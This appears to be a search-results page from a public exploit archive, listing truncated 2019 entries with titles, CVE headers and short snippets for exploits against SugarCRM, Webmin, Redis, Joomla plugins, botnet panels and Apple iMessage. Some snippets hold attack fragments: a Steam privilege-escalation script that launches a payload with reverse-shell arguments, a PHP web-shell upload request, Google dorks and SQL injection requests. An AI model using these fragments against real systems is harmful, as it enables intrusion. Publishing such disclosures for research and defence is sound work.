47884 matches found
SugarCRM Enterprise 9.0.0 - Cross-Site Scripting
Exploit Title: 0Day UnauthenticatedXSS SugarCRM Enterprise Google Dork: N/A Date: 11.08.2019 Exploit Author: Ilca Lucian Florin Vendor Homepage: https://www.sugarcrm.com Version: 9.0.0 Tested on: Windows 7 / Internet Explorer 11 / Google Chrome 76 CVE : 2019-14974 The application fails to sanitiz...
TortoiseSVN 1.12.1 - Remote Code Execution
Document Title: =============== TortoiseSVN v1.12.1 - Remote Code Execution Vulnerability References Source: ==================== https://www.vulnerability-lab.com/getcontent.php?id=2188 Product:...
Agent Tesla Botnet - Arbitrary Code Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "Tesla Agent Remote Code Execution", 'Description' = %q This module exploits the command injection vulnerability of tesla agent botnet panel. ,...
ABC2MTEX 1.6.1 - Command Line Stack Overflow
Exploit Title: ABC2MTEX 1.6.1 - Command Line Stack Overflow Date: 2019-08-13 Exploit Author: Carter Yagemann Vendor Homepage: https://abcnotation.com/abc2mtex/ Software Link: https://github.com/mudongliang/source-packages/raw/master/CVE-2004-1257/abc2mtex1.6.1.tar.gz Version: 1.6.1 Tested on:...
Agent Tesla Botnet - Arbitrary Code Execution
import requests import argparse import base64 Agent Tesla C2 RCE by prsecurity For research purposes only. Don't pwn what you don't own. def getargs: parser = argparse.ArgumentParser prog="agentteslasploit.py", formatterclass=lambda prog: argparse.HelpFormatterprog, maxhelpposition=50, epilog= ''...
AZORult Botnet - SQL Injection
import requests import argparse import base64 Azorult 3.3.1 C2 SQLi by prsecurity For research purposes only. Don't pwn what you don't own. change GUID and XOR key to specific beacon, can be extracted from a sample guid =...
VxWorks 6.8 - TCP Urgent Pointer = 0 Integer Underflow
Exploit Title: VxWorks TCP Urgent pointer = 0 integer underflow vulnerability Discovered By: Armis Security PoC Author: Zhou Yu twitter: @504137480 Vendor Homepage: https://www.windriver.com Tested on: VxWorks 6.8 CVE: CVE-2019-12255 More Details:...
osTicket 1.12 - Formula Injection
Exploit Title: osTicket-v1.12 Formula Injection Vendor Homepage: https://osticket.com/ Software Link: https://osticket.com/download/ Exploit Author: Aishwarya Iyer Contact: https://twitter.com/aish9524 Website: https://about.me/aishiyer Category: webapps CVE: CVE-2019-14749 1. Description An issu...
ManageEngine Application Manager 14.2 - Privilege Escalation / Remote Command Execution (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "ManageEngine Application Manager v14.2 - Privilege Escalation / Remote Command Execution", 'Description' = %q This module exploits sqli and comman...
Mitsubishi Electric smartRTU / INEA ME-RTU - Unauthenticated OS Command Injection Bind Shell
!/usr/bin/python Exploit Title: Mitsubishi Electric smartRTU & INEA ME-RTU Unauthenticated OS Command Injection Date: 29 June 2019 Exploit Author: @xerubus | mogozobo.com Vendor Homepage: https://eu3a.mitsubishielectric.com/fa/en/products/cnt/plcccl/items/smartRTU/local Vendor Homepage:...
Ghidra (Linux) 9.0.4 - .gar Arbitrary Code Execution
import os import inspect import argparse import shutil from shutil import copyfile print"" print"" print"" print"" print"------------------CVE-2019-13623----------------" print"" print"" print"" print"-----------------Ghidra-Exploit-----------------" print"--Tested version: Ghidra Linux version =...
Mitsubishi Electric smartRTU / INEA ME-RTU - Unauthenticated Configuration Download
!/usr/bin/python Exploit Title: Mitsubishi Electric smartRTU & INEA ME-RTU Unauthenticated Configuration Download Date: 29 June 2019 Exploit Author: @xerubus | mogozobo.com Vendor Homepage: https://eu3a.mitsubishielectric.com/fa/en/products/cnt/plcccl/items/smartRTU/local Vendor Homepage:...
ManageEngine OpManager 12.4x - Privilege Escalation / Remote Command Execution (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "ManageEngine OpManager 12.4x - Privilege Escalation / Remote Command Execution", 'Description' = %q This module exploits sqli and command injectio...
Joomla! Component JS Jobs (com_jsjobs) 1.2.5 - 'cities.php' SQL Injection
Exploit Title: Joomla! component comjsjobs - SQL Injection Dork: inurl:"index.php?option=comjsjobs" Date: 11.08.19 Exploit Author: qw3rTyTy Vendor Homepage: https://www.joomsky.com/ Software Link: https://www.joomsky.com/5/download/1 Version: 1.2.5 Tested on: Debian/nginx/joomla 3.9.0 Vulnerabili...
Joomla! Component JS Support Ticket (com_jssupportticket) 1.1.6 - 'ticket.php' Arbitrary File Deletion
Exploit Title: Joomla! component comjssupportticket - Authenticated Arbitrary File Deletion Dork: inurl:"index.php?option=comjssupportticket" Date: 10.08.19 Exploit Author: qw3rTyTy Vendor Homepage: https://www.joomsky.com/ Software Link: https://www.joomsky.com/46/download/1.html Version: 1.1.6...
ManageEngine OpManager 12.4x - Unauthenticated Remote Command Execution (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "ManageEngine OpManager v12.4x - Unauthenticated Remote Command Execution", 'Description' = %q This module bypasses the user password requirement i...
BSI Advance Hotel Booking System 2.0 - 'booking_details.php Persistent Cross-Site Scripting
Exploit Title:BSI Advance Hotel Booking System Persistent XSS Google Dork: intext:Hotel Booking System v2.0 © 2008 - 2012 Copyright Best Soft Inc Date: Wed Jun 4 2014 Exploit Author: Angelo Ruwantha Vendor Homepage: http://www.bestsoftinc.com Software Link:...
UNA 10.0.0 RC1 - 'polyglot.php' Persistent Cross-Site Scripting
Exploit Title: UNA - 10.0.0-RC1 stored XSS vuln. Date: 2019 08 10 Exploit Author: Greg.Priest Vendor Homepage: https://una.io/ Software Link: https://github.com/unaio/una/tree/master/studio Version: UNA - 10.0.0-RC1 Tested on: Windows/Linux CVE : CVE-2019-14804 UNA-v.10.0.0-RC1 Stored XSS...
osTicket 1.12 - Persistent Cross-Site Scripting via File Upload
Exploit Title: osTicket-v1.12 Stored XSS via File Upload Vendor Homepage: https://osticket.com/ Software Link: https://osticket.com/download/ Exploit Author: Aishwarya Iyer Contact: https://twitter.com/aish9524 Website: https://about.me/aishiyer Category: webapps CVE: CVE-2019-14748 1. Descriptio...
Cisco Adaptive Security Appliance - Path Traversal (Metasploit)
require 'msf/core' class MetasploitModule "Cisco Adaptive Security Appliance - Path Traversal", 'Description' = %q Cisco Adaptive Security Appliance - Path Traversal CVE-2018-0296 A security vulnerability in Cisco ASA that would allow an attacker to view sensitive system information without...
Linux - Use-After-Free Reads in show_numa_stats()
/ On NUMA systems, the Linux fair scheduler tracks information related to NUMA faults in taskstruct::numafaults and taskstruct::numagroup. Both of these have broken object lifetimes. Since commit 82727018b0d3 "sched/numa: Call tasknumafree from doexecve", first in v3.13, -numafaults is freed not...
Steam Windows Client - Local Privilege Escalation
$SteamRegKey = "HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS" $MSIRegKey = "HKLM:\SYSTEM\CurrentControlSet\Services\msiserver" $RegDir = "C:\Windows\Temp\RegLN.exe" $PayDir = "C:\Windows\Temp\payload.exe" $Payload = "c:\windows\system32\cmd.exe /c c:\windows\temp\payload.exe 127.0.0.1 4444 -e...
WebKit - UXSS via XSLT and Nested Document Replacements
VULNERABILITY DETAILS https://trac.webkit.org/browser/webkit/trunk/Source/WebCore/xml/XSLTProcessor.cppL66 Ref XSLTProcessor::createDocumentFromSourceconst String& sourceString, const String& sourceEncoding, const String& sourceMIMEType, Node sourceNode, Frame frame Ref...
Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Webmin 1.920 Unauthenticated RCE', 'Description' = %q This module exploits a backdoor in Webmin versions 1.890 through 1.920. Only the SourceForg...
osTicket 1.12 - Persistent Cross-Site Scripting
Exploit Title: osTicket-v1.12 Stored XSS Vendor Homepage: https://osticket.com/ Software Link: https://osticket.com/download/ Exploit Author: Aishwarya Iyer Contact: https://twitter.com/aish9524 Website: https://about.me/aishiyer Category: webapps CVE: CVE-2019-14750 1. Description An issue was...
Joomla! Component JS Support Ticket (com_jssupportticket) 1.1.6 - 'ticketreply.php' SQL Injection
Exploit Title: Joomla! component comjssupportticket - Authenticated SQL Injection Dork: inurl:"index.php?option=comjssupportticket" Date: 10.08.19 Exploit Author: qw3rTyTy Vendor Homepage: https://www.joomsky.com/ Software Link: https://www.joomsky.com/46/download/1.html Version: 1.1.6 Tested on:...
Daily Expense Manager 1.0 - Cross-Site Request Forgery (Delete Income)
Exploit Title: Daily Expense Manager - CSRF Delete Income Exploit Author: Mr Winst0n Author E-mail: [email protected] Discovery Date: August 8, 2019 Vendor Homepage: https://sourceforge.net/projects/daily-expense-manager/ Tested Version: 1.0 Tested on: Parrot OS PoC:...
Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 - SQL Injection
Exploit Title: Joomla! component comjssupportticket - SQL Injection Dork: inurl:"index.php?option=comjssupportticket" Date: 08.08.19 Exploit Author: qw3rTyTy Vendor Homepage: https://www.joomsky.com/ Software Link: https://www.joomsky.com/46/download/1.html Version: 1.1.5 Tested on:...
Adive Framework 2.0.7 - Cross-Site Request Forgery
Exploit Title: Adive Framework 2.0.7 – Cross-Site Request Forgery CSRF Date:02/08/2019. Exploit Author: Pablo Santiago Vendor Homepage: https://adive.es Software Link: https://github.com/ferdinandmartin/adive-php7 Version: 2.0.7 Tested on: Windows and Kali linux CVE :2019-14346 1. Technical...
Baldr Botnet Panel - Arbitrary Code Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'net/http' class MetasploitModule "Baldr Botnet Panel Shell Upload Exploit", 'Description' = %q This module exploits the file upload vulnerability of baldr malwa...
Open-School 3.0 / Community Edition 2.3 - Cross-Site Scripting
Exploit Title: title Date: 2019 08 06 Exploit Author: Greg.Priest Vendor Homepage: https://open-school.org/ Software Link: Version: Open-School 3.0/Community Edition 2.3 Tested on: Windows/Linux CVE : CVE-2019-14696 Open-School 3.0, and Community Edition 2.3, allows XSS via the...
Joomla! Component JS Support Ticket (component com_jssupportticket) 1.1.5 - Arbitrary File Download
Exploit Title: Joomla! component comjssupportticket - Arbitrary File Download Dork: inurl:"index.php?option=comjssupportticket" Date: 08.08.19 Exploit Author: qw3rTyTy Vendor Homepage: http://joomsky.com/ Software Link: https://www.joomsky.com/46/download/1.html Version: 1.1.5 Tested on:...
Aptana Jaxer 1.0.3.4547 - Local File inclusion
Exploit Title: Aptana Jaxer Remote Local File inclusion Date: 8/8/2019 Exploit Author: Steph Jensen Vendor Homepage: http://www.jaxer.org Version: 1.0.3.4547 Tested on: Linux CVE : CVE-2019-14312 Aptana Jaxer 1.0.3.4547 is vulnerable to a local file inclusion vulnerability in the wikilite source...
Google Chrome 74.0.3729.0 / 76.0.3789.0 - Heap Use-After-Free in blink::PresentationAvailabilityState::UpdateAvailability
iterating&iteratinglisteners, true; for auto& listenerref : availabilitylisteners auto listener = listenerref.get; if !listener-urls.Containsurl continue; auto screenavailability = GetScreenAvailabilitylistener-urls; DCHECKscreenavailability != mojom::blink::ScreenAvailability::UNKNOWN; for auto...
WordPress Plugin JoomSport 3.3 - SQL Injection
Exploit Title: JoomSport 3.3 – for Sports - SQL injection Google Dork: intext:powered by JoomSport - sport WordPress plugin Date:29/07/2019. Exploit Author: Pablo Santiago Vendor Homepage: https://beardev.com/ Software Link: https://wordpress.org/plugins/joomsport-sports-league-results-management...
ARMBot Botnet - Arbitrary Code Execution
import requests URL = "http://127.0.0.1/ARMBot/upload.php" r = requests.postURL, data = "file":"../publichtml/lol/../.s.phtml", need some trickery for each server ; "data":"PD9waHAgZWNobyAxOyA/Pg==", "message":"Bobr Dobr" , proxies="http":"127.0.0.1:8080","https":"127.0.0.1:8080" printr.statuscod...
macOS iMessage - Heap Overflow when Deserializing
There is a heap overflow in NSURL initWithCoder: that can be reached via iMessage and likely other paths. When an NSURL is deserialized, one property its plist can contain is NS.minimalBookmarkData, which is then used as a parameter for NSURL...
Apache Tika 1.15 - 1.17 - Header Command Injection (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Apache Tika Header Command Injection', 'Description' = %q This module exploits a command injection vulnerability in Apache Tika 1.15 - 1.17 on...
Sar2HTML 3.2.1 - Remote Command Execution
Exploit Title: sar2html Remote Code Execution Date: 01/08/2019 Exploit Author: Furkan KAYAPINAR Vendor Homepage:https://github.com/cemtan/sar2html Software Link: https://sourceforge.net/projects/sar2html/ Version: 3.2.1 Tested on: Centos 7 In web application you will see index.php?plot url...
1CRM On-Premise Software 8.5.7 - Persistent Cross-Site Scripting
1CRM On-Premise Software 8.5.7 Stored XSS //////////////////////////////////////////////////////////////////////////////////// Exploit Title: 1CRM On-Premise Software 8.5.7 - Cross-Site Scripting Date: 19/07/2019 Exploit Author: Kusol Watchara-Apanukorn Vendor Homepage: https://1crm.com/ Version:...
Rest - Cafe and Restaurant Website CMS - 'slug' SQL Injection
Exploit Title: Rest - Cafe and Restaurant Website CMS - SQL Injection Date: 1.8.2019. Exploit Author: n1x MS-WEB Vendor Homepage: https://codecanyon.net/item/rest-cafe-and-restaurant-website-cms/21630154 CWE : CWE-89 Vulnerable parameter: slug news.php GET Request GET //host/path/news.php?slug=x'...
Cisco Catalyst 3850 Series Device Manager - Cross-Site Request Forgery
Product : Catalyst 3850 Series Device Manager Version : 3.6.10E Date: 01.08.2019 Vendor Homepage: https://www.cisco.com Exploit Author: Alperen Soydan Description : The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify...
Ultimate Loan Manager 2.0 - Cross-Site Scripting
Exploit Title:Web Studio Ultimate Loan Manager V2.0 - Persistent Cross Site Scripting Exploit Author: Metin Yunus Kandemir kandemir Vendor Homepage: http://www.webstudio.co.zw/ Software Link: https://codecanyon.net/item/ultimate-loan-manager/19891884 Version: V2.0 Category: Webapps Software...
SilverSHielD 6.x - Local Privilege Escalation
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework Exploit Title: extenua SilverSHielD 6.x local priviledge escalation Google Dork: na Date: 31 Jul 2019 Exploit Author: Ian Bredemeyer Vendor Homepage:...
WebIncorp ERP - SQL injection
Exploit Title: WebIncorp ERP - SQL injection Date: 1.8.2019. Exploit Author: n1x MS-WEB Vendor Homepage: https://www.webincorp.com/products/erp-software-qatar Version: Every version CWE : CWE-89 Vulnerable parameter: prodid productdetail.php GET Request GET https://host/productdetail.php?prodid=x...
Oracle Hyperion Planning 11.1.2.3 - XML External Entity
Exploit Title: XXE Injection Oracle Hyperion - Exploit Author: Lucas Dinucci [email protected] - Twitter: @identik1t - Vendor Homepage: https://www.oracle.com/applications/performance-management - Date: 02/11/2019 - Affected Product: Oracle Hyperion Enterprise Performance Management System -...
iMessage - Memory Corruption when Decoding NSKnownKeysDictionary1
There is a memory corruption vulnerability when decoding an object of class NSKnownKeysDictionary1. This class decodes an object of type NSKnownKeysMappingStrategy1, which decodes a length member which is supposed to represent the length of the keys of the dictionary. However, this member is...
iMessage - NSArray Deserialization can Invoke Subclass that does not Retain References
When deserializing a class with initWithCoder, subclasses of that class can also be deserialized so long as they do not override initWithCoder and implement all methods that require a concrete implementation. PFArray is such a subclass of NSArray. When a PFArray is deserialized, it is deserialize...
Redis 4.x / 5.x - Unauthenticated Code Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Redis Unauthenticated Code Execution', 'Description' = %q This module can be used to leverage the extension functionality added by Redis 4.x and...
iMessage - NSKeyedUnarchiver Deserialization Allows file Backed NSData Objects
The class NSDataFileBackedFuture can be deserialized even if secure encoding is enabled. This class is a file-backed NSData object that loads a local file into memory when the NSData bytes selector is called. This presents two problems. First, it could potentially allow undesired access to local...